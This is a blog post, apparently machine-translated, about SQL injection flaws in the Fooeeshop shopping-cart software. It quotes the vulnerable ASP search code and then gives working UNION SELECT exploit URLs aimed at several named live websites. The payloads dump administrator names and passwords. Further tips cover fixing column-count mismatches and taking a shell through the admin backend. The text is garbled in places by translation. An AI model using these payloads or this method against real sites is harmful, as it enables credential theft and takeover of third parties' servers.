Fooeeshop Injection Vulnerability

From ShaunS Blog
Fooeeshop injection vulnerability occurs in the search area. There are 2 places.
1. Gift_Search_List.Asp

Dim strGift_Key: strGift_Key = Request. QueryString ("Gift_Key") The Gift_Key is not checked here
Dim intGift_Point_From: intGift_Point_From = Request. QueryString ("Gift_Point_From ")
Dim intGift_Point_To: intGift_Point_To = Request. QueryString ("Gift_Point_To ")
Dim intGift_Category: intGift_Category = Request. QueryString ("Gift_Category ")
StrSQL = "SELECT * FROM FOOEE_GIFT WHERE GIFT_NAME LIKE %" & strGift_Key & "%" put in the database here, injection occurs
If intGift_Category <> "" And IsNumeric (intGift_Category) Then
StrSQL = strSQL & "AND GIFT_CATEGORYID =" & intGift_Category &""
End If from ShaunS Blog www.virusest.com
If intGift_Category = "" Then intGift_Category = 0
If intGift_Point_From <> "" And IsNumeric (intGift_Point_From) And intGift_Point_To <> "" And IsNumeric (intGift_Point_To) Then
StrSQL = strSQL & "AND GIFT_POINT BETWEEN" & intGift_Point_From & "AND" & intGift_Point_To &""
End If

After the Shaun test, we need to use it here. The website must have a gift to deliver to query the results. Otherwise, the injection fails.
Exp:
Http://www.shaokaolu.cn/Gift_Search_List.ASP? Gift_key = % 25% 27 + and + 1% 3D2 + union + select + 1% 2C2% 2CADMIN_NAME % 26ADMIN_PASSWORD % 2C4% 2C5% 2C6% 2C7% 2C8% 2C9% 2C10% 2C11% 2C12% 2C13% 2C14% 2C15% 2C16 + from + FOOEE_ADMINISTRATOR + where + % 27% 25% 27% 3D % 27

Http://www.020kfc.cn/Gift_Search_List.ASP? Gift_key = % 25% 27 + and + 1% 3D2 + union + select + 1% 2C2% 2CADMIN_NAME % 26ADMIN_PASSWORD % 2C4% 2C5% 2C6% 2C7% 2C8% 2C9% 2C10% 2C11% 2C12% 2C13% 2C14% 2C15% 2C16 + from + FOOEE_ADMINISTRATOR + where + % 27% 25% 27% 3D % 27

2. SEARCHRESULT/Index. ASP

Dim strKeyWords: strKeyWords = Fooee. CheckStr (Request. QueryString ("KeyWords "))
Dim intStartPrice: intStartPrice = Request. QueryString ("StartPrice ")
Dim intEndPrice: intEndPrice = Request. QueryString ("EndPrice ")
Dim intProductCategoryID: intProductCategoryID = Request. QueryString ("ProductCategoryID ")
Dim strProductBrand: strProductBrand = Request. QueryString ("ProductBrand ")
Dim strSearchType: strSearchType = Request. QueryString ("SearchType ")
Dim strSQL: strSQL = "SELECT * FROM FOOEE_PRODUCT WHERE PRO_NAME LIKE %" & strKeyWords & "% AND PRO_DISPLAY = 1"
If intProductCategoryID <> "" And IsNumeric (intProductCategoryID) Then
StrSQL = strSQL & "AND PRO_SORT =" & Fooee. CheckNum (intProductCategoryID )&""
End If
If strProductBrand <> "" Then
StrSQL = strSQL & "AND PRO_BRAND =" & strProductBrand & "" strProductBrand is not checked for warehouse receiving
End If from ShaunS Blog www.virusest.com
If intStartPrice <> "" And IsNumeric (intStartPrice) And intEndPrice <> "" And IsNumeric (intEndPrice) Then
StrSQL = strSQL & "AND PRO_SHOPPRICE BETWEEN" & Fooee. CheckNum (intStartPrice) & "AND" & Fooee. CheckNum (intEndPrice )&""
End If

This is easy to use. As long as the website enables advanced search, click Advanced Search, select a brand, search, and write down the brand data in the browser column, and inject the data.
Exp:
Http://www.0779home.com/SearchResult? ProductBrand = % D4 % BD % C4 % CF % CD % AC % BC % C3 % 20 union % 20 select %, 0, 0, admin_name % 2badmin_password, 0,, from % 20FOOEE_ADMINISTRATOR

Http://www.myhdd.com.cn/SearchResult? ProductBrand = % CE % F7 % B2 % BF % CA % FD % BE % DD % 20 union % 20 select %, 0, 0, admin_name % 2badmin_password, 0, 0, 0, 0, 0, 0, 0, 0, from % 20FOOEE_ADMINISTRATOR

If you are prompted that the number of columns does not match, try to increase or decrease the number of columns.

The background uses Shell for research.